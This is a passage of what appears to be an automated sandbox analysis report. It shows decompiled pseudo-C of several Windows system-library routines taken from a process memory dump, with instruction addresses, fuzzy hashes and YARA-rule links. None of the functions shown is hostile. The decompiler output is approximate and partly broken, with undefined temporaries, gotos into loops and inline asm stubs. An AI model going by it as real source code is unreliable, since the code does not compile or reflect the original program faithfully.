				intOrPtr* _t27;
				void* _t28;
				intOrPtr* _t29;

				_t27 = __edx;
				_t28 = __ecx;
				if(__edx == 0) {
					E048F2280(_t6, 0x49c8550);
				}
				_t29 = E0491387E(_t28);
				if(_t29 == 0) {
					L6:
					if(_t27 == 0) {
						E048EFFB0(0x49c8550, _t27, 0x49c8550);
					}
					if(_t29 == 0) {
						return 0xc0000225;
					} else {
						if(_t27 != 0) {
							goto L14;
						}
						L048F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t27, _t29);
						goto L11;
					}
				} else {
					_t13 =  *_t29;
					if( *((intOrPtr*)(_t13 + 4)) != _t29) {
						L13:
						_push(3);
						asm("int 0x29");
						L14:
						 *_t27 = _t29;
						L11:
						return 0;
					}
					_t20 =  *((intOrPtr*)(_t29 + 4));
					if( *_t20 != _t29) {
						goto L13;
					}
					 *_t20 = _t13;
					 *((intOrPtr*)(_t13 + 4)) = _t20;
					asm("btr eax, ecx");
					goto L6;
				}
			}

0x049137fa
0x049137fc
0x04913805
0x04913808
0x04913808
0x04913814
0x04913818
0x04913846
0x04913848
0x0491384b
0x0491384b
0x04913852
0x00000000
0x04913854
0x04913856
0x00000000
0x00000000
0x04913863
0x00000000
0x04913863
0x0491381a
0x0491381a
0x0491381f
0x0491386e
0x0491386e
0x04913871
0x04913873
0x04913873
0x04913868
0x00000000
0x04913868
0x04913821
0x04913826
0x00000000
0x00000000
0x04913828
0x0491382a
0x04913841
0x00000000
0x04913841

Memory Dump Source

Source File: 00000006.00000002.608016293.00000000048B0000.00000040.00000001.sdmp, Offset: 048B0000, based on PE: true

Associated: 00000006.00000002.609135839.00000000049CB000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.609175517.00000000049CF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4c94896c560b531074771db423a6240966180d8649fd1915f333b1ad9da21e76
Instruction ID: 6c9cb3507e313681598afc612166d89cf210aadfcedb5505688d8fa303f17a89
Opcode Fuzzy Hash: 4c94896c560b531074771db423a6240966180d8649fd1915f333b1ad9da21e76
Instruction Fuzzy Hash: 1901C4B2A016149BE3379B5E9940A26BBBADF85B6071584F9ED498B260DB30F801C780

Uniqueness

Uniqueness Score: -1.00%

Function 048DC962, Relevance: .1, Instructions: 57
COMMON

Download Yara Rule

C-Code - Quality: 42%

			E048DC962(char __ecx) {
				signed int _v8;
				intOrPtr _v12;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t19;
				char _t22;
				void* _t26;
				void* _t27;
				char _t32;
				char _t34;
				void* _t35;
				void* _t37;
				intOrPtr* _t38;
				signed int _t39;

				_t41 = (_t39 & 0xfffffff8) - 0xc;
				_v8 =  *0x49cd360 ^ (_t39 & 0xfffffff8) - 0x0000000c;
				_t34 = __ecx;
				if(( *( *[fs:0x30] + 0x68) & 0x00000100) != 0) {
					_t26 = 0;
					E048EEEF0(0x49c70a0);
					_t29 =  *((intOrPtr*)(_t34 + 0x18));
					if(E0495F625( *((intOrPtr*)(_t34 + 0x18))) != 0) {
						L9:
						E048EEB70(_t29, 0x49c70a0);
						_t19 = _t26;
						L2:
						_pop(_t35);
						_pop(_t37);
						_pop(_t27);
						return E0491B640(_t19, _t27, _v8 ^ _t41, _t32, _t35, _t37);
					}
					_t29 = _t34;
					_t26 = E0495F1FC(_t34, _t32);
					if(_t26 < 0) {
						goto L9;
					}
					_t38 =  *0x49c70c0; // 0x0
					while(_t38 != 0x49c70c0) {
						_t22 =  *((intOrPtr*)(_t38 + 0x18));
						_t38 =  *_t38;
						_v12 = _t22;
						if(_t22 != 0) {
							_t29 = _t22;
							 *0x49cb1e0( *((intOrPtr*)(_t34 + 0x30)),  *((intOrPtr*)(_t34 + 0x18)),  *((intOrPtr*)(_t34 + 0x20)), _t34);
							_v12();
						}
					}
					goto L9;
				}
				_t19 = 0;
				goto L2;
			}

0x048dc96a
0x048dc974
0x048dc988
0x048dc98a
0x04947c9d
0x04947c9f
0x04947ca4
0x04947cae
0x04947cf0
0x04947cf5
0x04947cfa
0x048dc992
0x048dc996
0x048dc997
0x048dc998
0x048dc9a3
0x048dc9a3
0x04947cb0
0x04947cb7
0x04947cbb
0x00000000
0x00000000
0x04947cbd
0x04947ce8
0x04947cc5
0x04947cc8
0x04947cca
0x04947cd0
0x04947cd6
0x04947cde
0x04947ce4
0x04947ce4
0x04947cd0
0x00000000
0x04947ce8
0x048dc990
0x00000000

Memory Dump Source

Source File: 00000006.00000002.608016293.00000000048B0000.00000040.00000001.sdmp, Offset: 048B0000, based on PE: true

Associated: 00000006.00000002.609135839.00000000049CB000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.609175517.00000000049CF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 55d699820a2a82fb54fab8f7a7bd94faa8888581c69b358a9a105bd0bd8c1386
Instruction ID: 75cc67bb6b16a671ea5ad77193a63418401cdef9ebfdfadc6205e3788f08f3c5
Opcode Fuzzy Hash: 55d699820a2a82fb54fab8f7a7bd94faa8888581c69b358a9a105bd0bd8c1386
Instruction Fuzzy Hash: 5011E53170464A9FD710EFA8DC85D2B77E5FBC4625B100A78E94193650EB24FD10CBD2

Uniqueness

Uniqueness Score: -1.00%

Function 0490002D, Relevance: .1, Instructions: 55
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0490002D() {
				void* _t11;
				char* _t14;
				signed char* _t16;
				char* _t27;
				signed char* _t29;

				_t11 = E048F7D50();
				_t27 = 0x7ffe0384;
				if(_t11 != 0) {
					_t14 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
				} else {
					_t14 = 0x7ffe0384;
				}
				_t29 = 0x7ffe0385;
				if( *_t14 != 0) {
					if(E048F7D50() == 0) {
						_t16 = 0x7ffe0385;
					} else {
						_t16 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
					}
					if(( *_t16 & 0x00000040) != 0) {
						goto L18;
					} else {
						goto L3;
					}
				} else {
					L3:
					if(E048F7D50() != 0) {
						_t27 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					}
					if( *_t27 != 0) {
						if(( *( *[fs:0x30] + 0x240) & 0x00000004) == 0) {
							goto L5;
						}
						if(E048F7D50() != 0) {
							_t29 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
						}
						if(( *_t29 & 0x00000020) == 0) {
							goto L5;
						}
						L18:
						return 1;
					} else {
						L5:
						return 0;
					}
				}
			}

0x04900032
0x04900037
0x04900043
0x04944b3a
0x04900049
0x04900049
0x04900049
0x0490004e
0x04900053
0x04944b48
0x04944b5a
0x04944b4a
0x04944b53
0x04944b53
0x04944b5f
0x00000000
0x04944b61
0x00000000
0x04944b61
0x04900059
0x04900059
0x04900060
0x04944b6f
0x04944b6f
0x04900069
0x04944b83
0x00000000
0x00000000
0x04944b90
0x04944b9b
0x04944b9b
0x04944ba4
0x00000000
0x00000000
0x04944baa
0x00000000
0x0490006f
0x0490006f
0x00000000
0x0490006f
0x04900069

Memory Dump Source

Source File: 00000006.00000002.608016293.00000000048B0000.00000040.00000001.sdmp, Offset: 048B0000, based on PE: true

Associated: 00000006.00000002.609135839.00000000049CB000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.609175517.00000000049CF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8d774e958955e2a4888292503cae141afd510c2672050b36ba74763b54e4c63a
Instruction ID: 58c82aa922c6ac9262db5c0c72b33c26e37e8c404622087dbe2d9120f26bd5ec
Opcode Fuzzy Hash: 8d774e958955e2a4888292503cae141afd510c2672050b36ba74763b54e4c63a
Instruction Fuzzy Hash: 0211A1326066C18FE7229B28DD44F3977E9AF81B58F0904B1DD04DB692E769F841C661

Uniqueness

Uniqueness Score: -1.00%

Function 048E766D, Relevance: .1, Instructions: 54
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E048E766D(void* __ecx, signed int __edx, signed int _a4, signed int _a8, signed int _a12, intOrPtr* _a16) {
				char _v8;
				void* _t22;
				void* _t24;
				intOrPtr _t29;
				intOrPtr* _t30;
				void* _t42;
				intOrPtr _t47;

				_push(__ecx);
				_t36 =  &_v8;
				if(E0490F3D5( &_v8, __edx * _a4, __edx * _a4 >> 0x20) < 0) {
					L10:
					_t22 = 0;
				} else {
					_t24 = _v8 + __ecx;
					_t42 = _t24;
					if(_t24 < __ecx) {
						goto L10;
					} else {
						if(E0490F3D5( &_v8, _a8 * _a12, _a8 * _a12 >> 0x20) < 0) {
							goto L10;
						} else {
							_t29 = _v8 + _t42;
							if(_t29 < _t42) {
								goto L10;
							} else {
								_t47 = _t29;
								_t30 = _a16;
								if(_t30 != 0) {
									 *_t30 = _t47;
								}
								if(_t47 == 0) {
									goto L10;
								} else {
									_t22 = L048F4620(_t36,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t47);
								}
							}
						}
					}
				}
				return _t22;
			}

0x048e7672
0x048e767f
0x048e7689
0x048e76de
0x048e76de
0x048e768b
0x048e7691
0x048e7693
0x048e7697
0x00000000
0x048e7699
0x048e76a8
0x00000000
0x048e76aa
0x048e76ad
0x048e76b1
0x00000000
0x048e76b3
0x048e76b3
0x048e76b5
0x048e76ba
0x048e76bc
0x048e76bc
0x048e76c0
0x00000000
0x048e76c2
0x048e76ce
0x048e76ce
0x048e76c0
0x048e76b1
0x048e76a8
0x048e7697
0x048e76d9

Memory Dump Source

Source File: 00000006.00000002.608016293.00000000048B0000.00000040.00000001.sdmp, Offset: 048B0000, based on PE: true

Associated: 00000006.00000002.609135839.00000000049CB000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.609175517.00000000049CF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0f0f9780e106b949b133bc76075252866a2fc865c05abd63e27a9356099b865c
Instruction ID: 6042568627213c7b45cd438675d98826cd6fa2dca8eca962da661284df1341ce
Opcode Fuzzy Hash: 0f0f9780e106b949b133bc76075252866a2fc865c05abd63e27a9356099b865c
Instruction Fuzzy Hash: 53018832700119EFD720BE5FDC41E6B77ADEB85764B144A34BA08CB264DA70ED0187A0

Uniqueness

Uniqueness Score: -1.00%

Function 0496C450, Relevance: .1, Instructions: 53
COMMON

Download Yara Rule

C-Code - Quality: 46%

			E0496C450(intOrPtr* _a4) {
				signed char _t25;
				intOrPtr* _t26;
				intOrPtr* _t27;

				_t26 = _a4;
				_t25 =  *(_t26 + 0x10);
				if((_t25 & 0x00000003) != 1) {
					_push(0);
					_push(0);
					_push(0);
					_push( *((intOrPtr*)(_t26 + 8)));
					_push(0);
					_push( *_t26);
					E04919910();
					_t25 =  *(_t26 + 0x10);
				}
				if((_t25 & 0x00000001) != 0) {
					_push(4);
					_t7 = _t26 + 4; // 0x4
					_t27 = _t7;
					_push(_t27);
					_push(5);
					_push(0xfffffffe);
					E049195B0();
					if( *_t27 != 0) {
						_push( *_t27);
						E049195D0();
					}
				}
				_t8 = _t26 + 0x14; // 0x14
				if( *((intOrPtr*)(_t26 + 8)) != _t8) {
					L048F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *((intOrPtr*)(_t26 + 8)));
				}
				_push( *_t26);
				E049195D0();
				return L048F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t26);
			}

0x0496c458
0x0496c45d
0x0496c466
0x0496c468
0x0496c469
0x0496c46a
0x0496c46b
0x0496c46e
0x0496c46f
0x0496c471
0x0496c476
0x0496c476
0x0496c47c
0x0496c47e
0x0496c480
0x0496c480
0x0496c483
0x0496c484
0x0496c486
0x0496c488
0x0496c48f
0x0496c491
0x0496c493
0x0496c493
0x0496c48f
0x0496c498
0x0496c49e
0x0496c4ad
0x0496c4ad
0x0496c4b2
0x0496c4b4
0x0496c4cd

Memory Dump Source

Source File: 00000006.00000002.608016293.00000000048B0000.00000040.00000001.sdmp, Offset: 048B0000, based on PE: true

Associated: 00000006.00000002.609135839.00000000049CB000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.609175517.00000000049CF000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: efb8dbafbc21be99c6828cd6b94329c97088fdc8e1727ade4875afce538aa955
Instruction ID: 2e852684e19a7aa6899c220a129ab31a3bb92871aeddafe6721a37d2678ac71b
Opcode Fuzzy Hash: efb8dbafbc21be99c6828cd6b94329c97088fdc8e1727ade4875afce538aa955
Instruction Fuzzy Hash: 640192B2140509BFE721AF69CC90EA2FB6DFF94394F004535F65552570CB32BCA0CAA0

Uniqueness

Uniqueness Score: -1.00%

Function 048D9080, Relevance: .1, Instructions: 53
COMMON

Download Yara Rule

C-Code - Quality: 69%

			E048D9080(void* __ebx, intOrPtr* __ecx, void* __edi, void* __esi) {
				intOrPtr* _t51;
				intOrPtr _t59;
				signed int _t64;
				signed int _t67;
				signed int* _t71;
				signed int _t74;
				signed int _t77;
				signed int _t82;
				intOrPtr* _t84;
				void* _t85;
				intOrPtr* _t87;
				void* _t94;
				signed int _t95;
				intOrPtr* _t97;
				signed int _t99;
				signed int _t102;
				void* _t104;

				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_t97 = __ecx;
				_t102 =  *(__ecx + 0x14);
				if((_t102 & 0x02ffffff) == 0x2000000) {
					_t102 = _t102 | 0x000007d0;
				}
				_t48 =  *[fs:0x30];
				if( *((intOrPtr*)( *[fs:0x30] + 0x64)) == 1) {
					_t102 = _t102 & 0xff000000;
				}
				_t80 = 0x49c85ec;
				E048F2280(_t48, 0x49c85ec);
				_t51 =  *_t97 + 8;
				if( *_t51 != 0) {
					L6:
					return E048EFFB0(_t80, _t97, _t80);
				} else {
					 *(_t97 + 0x14) = _t102;
					_t84 =  *0x49c538c; // 0x52d798
					if( *_t84 != 0x49c5388) {
						_t85 = 3;
						asm("int 0x29");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						_push(0x2c);
						_push(0x49af6e8);
						E0492D0E8(0x49c85ec, _t97, _t102);
						 *((char*)(_t104 - 0x1d)) = 0;
						_t99 =  *(_t104 + 8);
						__eflags = _t99;
						if(_t99 == 0) {
							L13:
							__eflags =  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28));
							if(__eflags == 0) {
								E049A88F5(_t80, _t85, 0x49c5388, _t99, _t102, __eflags);
							}
						} else {
							__eflags = _t99 -  *0x49c86c0; // 0x5107b0
							if(__eflags == 0) {
								goto L13;
							} else {
								__eflags = _t99 -  *0x49c86b8; // 0x0
								if(__eflags == 0) {
									goto L13;
								} else {
									_t59 =  *((intOrPtr*)( *[fs:0x30] + 0xc));
									__eflags =  *((char*)(_t59 + 0x28));
									if( *((char*)(_t59 + 0x28)) == 0) {
										E048F2280(_t99 + 0xe0, _t99 + 0xe0);
										 *(_t104 - 4) =  *(_t104 - 4) & 0x00000000;
										__eflags =  *((char*)(_t99 + 0xe5));
										if(__eflags != 0) {
											E049A88F5(0x49c85ec, _t85, 0x49c5388, _t99, _t102, __eflags);
										} else {
											__eflags =  *((char*)(_t99 + 0xe4));
											if( *((char*)(_t99 + 0xe4)) == 0) {
												 *((char*)(_t99 + 0xe4)) = 1;
												_push(_t99);
												_push( *((intOrPtr*)(_t99 + 0x24)));
												E0491AFD0();
											}
											while(1) {
												_t71 = _t99 + 8;
												 *(_t104 - 0x2c) = _t71;
												_t80 =  *_t71;
												_t95 = _t71[1];
												 *(_t104 - 0x28) = _t80;
												 *(_t104 - 0x24) = _t95;
												while(1) {
													L19:
													__eflags = _t95;
													if(_t95 == 0) {
														break;
													}
													_t102 = _t80;
													 *(_t104 - 0x30) = _t95;
													 *(_t104 - 0x24) = _t95 - 1;
													asm("lock cmpxchg8b [edi]");
													_t80 = _t102;
													 *(_t104 - 0x28) = _t80;
													 *(_t104 - 0x24) = _t95;
													__eflags = _t80 - _t102;
													_t99 =  *(_t104 + 8);
													if(_t80 != _t102) {
														continue;
													} else {
														__eflags = _t95 -  *(_t104 - 0x30);
														if(_t95 !=  *(_t104 - 0x30)) {
															continue;
														} else {
															__eflags = _t95;
															if(_t95 != 0) {
																_t74 = 0;
																 *(_t104 - 0x34) = 0;
																_t102 = 0;
																__eflags = 0;
																while(1) {
																	 *(_t104 - 0x3c) = _t102;
																	__eflags = _t102 - 3;
																	if(_t102 >= 3) {
																		break;
																	}
																	__eflags = _t74;
																	if(_t74 != 0) {
																		L49:
																		_t102 =  *_t74;
																		__eflags = _t102;
																		if(_t102 != 0) {
																			_t102 =  *(_t102 + 4);
																			__eflags = _t102;
																			if(_t102 != 0) {
																				 *0x49cb1e0(_t74, _t99);
																				 *_t102();
																			}
																		}
																		do {
																			_t71 = _t99 + 8;
																			 *(_t104 - 0x2c) = _t71;
																			_t80 =  *_t71;
																			_t95 = _t71[1];
																			 *(_t104 - 0x28) = _t80;
																			 *(_t104 - 0x24) = _t95;
																			goto L19;
																		} while (_t74 == 0);
																		goto L49;
																	} else {
																		_t82 = 0;
																		__eflags = 0;
																		while(1) {
																			 *(_t104 - 0x38) = _t82;
																			__eflags = _t82 -  *0x49c84c0;
																			if(_t82 >=  *0x49c84c0) {
																				break;
																			}
																			__eflags = _t74;
																			if(_t74 == 0) {
																				_t77 = E049A9063(_t82 * 0xc +  *((intOrPtr*)(_t99 + 0x10 + _t102 * 4)), _t95, _t99);
																				__eflags = _t77;
																				if(_t77 == 0) {
																					_t74 = 0;
																					__eflags = 0;
																				} else {
																					_t74 = _t77 + 0xfffffff4;
																				}
																				 *(_t104 - 0x34) = _t74;
																				_t82 = _t82 + 1;
																				continue;
																			}
																			break;
																		}
																		_t102 = _t102 + 1;
																		continue;
																	}
																	goto L20;
																}
																__eflags = _t74;
															}
														}
													}
													break;
												}
												L20:
												 *((intOrPtr*)(_t99 + 0xf4)) =  *((intOrPtr*)(_t104 + 4));
												 *((char*)(_t99 + 0xe5)) = 1;
												 *((char*)(_t104 - 0x1d)) = 1;
												goto L21;
											}
										}
										L21:
										 *(_t104 - 4) = 0xfffffffe;
										E048D922A(_t99);
										_t64 = E048F7D50();
										__eflags = _t64;
										if(_t64 != 0) {
											_t67 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
										} else {
											_t67 = 0x7ffe0386;
										}
										__eflags =  *_t67;
										if( *_t67 != 0) {
											_t67 = E049A8B58(_t99);
										}
										__eflags =  *((char*)(_t104 - 0x1d));
										if( *((char*)(_t104 - 0x1d)) != 0) {
											__eflags = _t99 -  *0x49c86c0; // 0x5107b0
											if(__eflags != 0) {
												__eflags = _t99 -  *0x49c86b8; // 0x0
												if(__eflags == 0) {
													_t94 = 0x49c86bc;
													_t87 = 0x49c86b8;
													goto L27;
												} else {
													__eflags = _t67 | 0xffffffff;
													asm("lock xadd [edi], eax");
													if(__eflags == 0) {
														E048D9240(_t80, _t99, _t99, _t102, __eflags);
													}
												}
											} else {
												_t94 = 0x49c86c4;
												_t87 = 0x49c86c0;
												L27:
												E04909B82(_t80, _t87, _t94, _t99, _t102, __eflags);
											}
										}
									} else {
										goto L13;
									}
								}
							}
						}
						return E0492D130(_t80, _t99, _t102);
					} else {
						 *_t51 = 0x49c5388;
						 *((intOrPtr*)(_t51 + 4)) = _t84;
						 *_t84 = _t51;
						 *0x49c538c = _t51;
						goto L6;
					}
				}
			}

0x048d9082
0x048d9083
0x048d9084
0x048d9085
0x048d9087
0x048d9096
0x048d9098
0x048d9098
0x048d909e
0x048d90a8
0x048d90e7
0x048d90e7
0x048d90aa
0x048d90b0
0x048d90b7
0x048d90bd
0x048d90dd
0x048d90e6
0x048d90bf
0x048d90bf
0x048d90c7
0x048d90cf
0x048d90f1
0x048d90f2
0x048d90f4
0x048d90f5
0x048d90f6
0x048d90f7
0x048d90f8
0x048d90f9
0x048d90fa
0x048d90fb
0x048d90fc
0x048d90fd
0x048d90fe
0x048d90ff
0x048d9100
0x048d9102
0x048d9107
0x048d910c
0x048d9110
0x048d9113
0x048d9115
0x048d9136
0x048d913f
0x048d9143
0x049337e4
0x049337e4
0x048d9117
0x048d9117
0x048d911d
0x00000000
0x048d911f
0x048d911f
0x048d9125
0x00000000
0x048d9127
0x048d912d
0x048d9130
0x048d9134
0x048d9158
0x048d915d
0x048d9161
0x048d9168
0x04933715
0x048d916e
0x048d916e
0x048d9175
0x048d9177
0x048d917e
0x048d917f
0x048d9182
0x048d9182
0x048d9187
0x048d9187
0x048d918a
0x048d918d
0x048d918f
0x048d9192
0x048d9195
0x048d9198
0x048d9198
0x048d9198
0x048d919a
0x00000000
0x00000000
0x0493371f
0x04933721
0x04933727
0x0493372f
0x04933733
0x04933735
0x04933738
0x0493373b
0x0493373d
0x04933740
0x00000000
0x04933746
0x04933746
0x04933749
0x00000000
0x0493374f
0x0493374f
0x04933751
0x04933757
0x04933759
0x0493375c
0x0493375c
0x0493375e
0x0493375e
0x04933761
0x04933764
0x00000000
0x00000000
0x04933766
0x04933768
0x049337a3
0x049337a3
0x049337a5
0x049337a7
0x049337ad
0x049337b0
0x049337b2
0x049337bc
0x049337c2
0x049337c2
0x049337b2
0x048d9187
0x048d9187
0x048d918a
0x048d918d
0x048d918f
0x048d9192
0x048d9195
0x00000000
0x048d9195
0x00000000
0x0493376a
0x0493376a
0x0493376a
0x0493376c
0x0493376c
0x0493376f
0x04933775
0x00000000
0x00000000
0x04933777
0x04933779
0x04933782
0x04933787
0x04933789
0x04933790
0x04933790
0x0493378b
0x0493378b
0x0493378b
0x04933792
0x04933795
0x00000000
0x04933795
0x00000000
0x04933779
0x04933798
0x00000000
0x04933798
0x00000000
0x04933768
0x0493379b
0x0493379b
0x04933751
0x04933749
0x00000000
0x04933740
0x048d91a0
0x048d91a3
0x048d91a9
0x048d91b0
0x00000000
0x048d91b0
0x048d9187
0x048d91b4
0x048d91b4
0x048d91bb
0x048d91c0
0x048d91c5
0x048d91c7
0x049337da
0x048d91cd
0x048d91cd
0x048d91cd
0x048d91d2
0x048d91d5
0x048d9239
0x048d9239
0x048d91d7
0x048d91db
0x048d91e1
0x048d91e7
0x048d91fd
0x048d9203
0x048d921e
0x048d9223
0x00000000
0x048d9205
0x048d9205
0x048d9208
0x048d920c
0x048d9214
0x048d9214
0x048d920c
0x048d91e9
0x048d91e9
0x048d91ee
0x048d91f3
0x048d91f3
0x048d91f3
0x048d91e7
0x00000000
0x00000000
0x00000000
0x048d9134
0x048d9125
0x048d911d
0x048d914e
0x048d90d1
0x048d90d1
0x048d90d3
0x048d90d6
0x048d90d8
0x00000000
0x048d90d8
0x048d90cf

Memory Dump Source

Source File: 00000006.00000002.608016293.00000000048B0000.00000040.00000001.sdmp, Offset: 048B0000, based on PE: true

Associated: 00000006.00000002.609135839.00000000049CB000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.609175517.00000000049CF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 02644178b9b66ea526ec60c3c4cfa1a8011e922560e71f583184775e972a0743
Instruction ID: 626a7be9d4b077707e69d732ec8738b9dc423b9bc3bb39721e730bc31df582e1
Opcode Fuzzy Hash: 02644178b9b66ea526ec60c3c4cfa1a8011e922560e71f583184775e972a0743
Instruction Fuzzy Hash: 1401F4B2602214DFE324AF08E840B11BBE9EB85324F264A76E601DB691C3B4FC41CBD1

Uniqueness

Uniqueness Score: -1.00%

Function 049A4015, Relevance: .0, Instructions: 49
COMMON

Download Yara Rule

C-Code - Quality: 86%

			E049A4015(signed int __eax, signed int __ecx) {
				void* __ebx;
				void* __edi;
				signed char _t10;
				signed int _t28;

				_push(__ecx);
				_t28 = __ecx;
				asm("lock xadd [edi+0x24], eax");
				_t10 = (__eax | 0xffffffff) - 1;
				if(_t10 == 0) {
					_t1 = _t28 + 0x1c; // 0x1e
					E048F2280(_t10, _t1);
					 *((intOrPtr*)(_t28 + 0x20)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
					E048F2280( *((intOrPtr*)( *[fs:0x18] + 0x24)), 0x49c86ac);
					E048DF900(0x49c86d4, _t28);
					E048EFFB0(0x49c86ac, _t28, 0x49c86ac);
					 *((intOrPtr*)(_t28 + 0x20)) = 0;
					E048EFFB0(0, _t28, _t1);
					_t18 =  *((intOrPtr*)(_t28 + 0x94));
					if( *((intOrPtr*)(_t28 + 0x94)) != 0) {
						L048F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t18);
					}
					_t10 = L048F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t28);
				}
				return _t10;
			}

0x049a401a
0x049a401e
0x049a4023
0x049a4028
0x049a4029
0x049a402b
0x049a402f
0x049a4043
0x049a4046
0x049a4051
0x049a4057
0x049a405f
0x049a4062
0x049a4067
0x049a406f
0x049a407c
0x049a407c
0x049a408c
0x049a408c
0x049a4097

Memory Dump Source

Source File: 00000006.00000002.608016293.00000000048B0000.00000040.00000001.sdmp, Offset: 048B0000, based on PE: true

Associated: 00000006.00000002.609135839.00000000049CB000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.609175517.00000000049CF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 98ce8d1d6f86bedf08e5597504c450e4896db1bca9182a864a3f3c3968b70964
Instruction ID: 66e211fa005381199fee30af8b2ad242d0174249bbba93684f14ee3eef9fe77f
Opcode Fuzzy Hash: 98ce8d1d6f86bedf08e5597504c450e4896db1bca9182a864a3f3c3968b70964
Instruction Fuzzy Hash: C40171712019457FE711AB6DCD80E53B7ACEB85658B000B29B608C3A51CBB4FC11C6E5

Uniqueness

Uniqueness Score: -1.00%

Function 049914FB, Relevance: .0, Instructions: 48
COMMON

Download Yara Rule

C-Code - Quality: 61%

			E049914FB(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				short _v54;
				char _v60;
				void* __edi;
				void* __esi;
				signed char* _t21;
				intOrPtr _t27;
				intOrPtr _t33;
				intOrPtr _t34;
				signed int _t35;

				_t32 = __edx;
				_t27 = __ebx;
				_v8 =  *0x49cd360 ^ _t35;
				_t33 = __edx;
				_t34 = __ecx;
				E0491FA60( &_v60, 0, 0x30);
				_v20 = _a4;
				_v16 = _a8;
				_v28 = _t34;
				_v24 = _t33;
				_v54 = 0x1034;
				if(E048F7D50() == 0) {
					_t21 = 0x7ffe0388;
				} else {
					_t21 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				_push( &_v60);
				_push(0x10);
				_push(0x20402);
				_push( *_t21 & 0x000000ff);
				return E0491B640(E04919AE0(), _t27, _v8 ^ _t35, _t32, _t33, _t34);
			}

0x049914fb
0x049914fb
0x0499150a
0x04991514
0x04991519
0x0499151b
0x04991526
0x0499152c
0x04991534
0x04991537
0x0499153a
0x04991545
0x04991557
0x04991547
0x04991550
0x04991550
0x04991562
0x04991563
0x04991565
0x0499156a
0x0499157f

Memory Dump Source

Source File: 00000006.00000002.608016293.00000000048B0000.00000040.00000001.sdmp, Offset: 048B0000, based on PE: true

Associated: 00000006.00000002.609135839.00000000049CB000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.609175517.00000000049CF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 78f4d96c2e2a5fe39e4f875bb83fb29d98ca8ecb88d429f0312489037c1ccd07
Instruction ID: 93b8d6c05b6e38745007bf8c2a9d5ee2f4ca4998f3d5eea54924c4960b5813e6
Opcode Fuzzy Hash: 78f4d96c2e2a5fe39e4f875bb83fb29d98ca8ecb88d429f0312489037c1ccd07
Instruction Fuzzy Hash: 8F019271A0124CAFDB04DFA8D842EAEBBB8EF44714F404066F914EB290D674EE00CB95

Uniqueness

Uniqueness Score: -1.00%

Function 0499138A, Relevance: .0, Instructions: 48
COMMON

Download Yara Rule

C-Code - Quality: 61%

			E0499138A(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				short _v54;
				char _v60;
				void* __edi;
				void* __esi;
				signed char* _t21;
				intOrPtr _t27;
				intOrPtr _t33;
				intOrPtr _t34;
				signed int _t35;

				_t32 = __edx;
				_t27 = __ebx;
				_v8 =  *0x49cd360 ^ _t35;
				_t33 = __edx;
				_t34 = __ecx;
				E0491FA60( &_v60, 0, 0x30);
				_v20 = _a4;
				_v16 = _a8;
				_v28 = _t34;
				_v24 = _t33;
				_v54 = 0x1033;
				if(E048F7D50() == 0) {
					_t21 = 0x7ffe0388;
				} else {
					_t21 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				_push( &_v60);
				_push(0x10);
				_push(0x20402);
				_push( *_t21 & 0x000000ff);
				return E0491B640(E04919AE0(), _t27, _v8 ^ _t35, _t32, _t33, _t34);
			}

0x0499138a
0x0499138a
0x04991399
0x049913a3
0x049913a8
0x049913aa
0x049913b5
0x049913bb
0x049913c3
0x049913c6
0x049913c9
0x049913d4
0x049913e6
0x049913d6
0x049913df
0x049913df
0x049913f1
0x049913f2
0x049913f4
0x049913f9
0x0499140e

Memory Dump Source

Source File: 00000006.00000002.608016293.00000000048B0000.00000040.00000001.sdmp, Offset: 048B0000, based on PE: true

Associated: 00000006.00000002.609135839.00000000049CB000.00000040.00000001.sdmp Download File
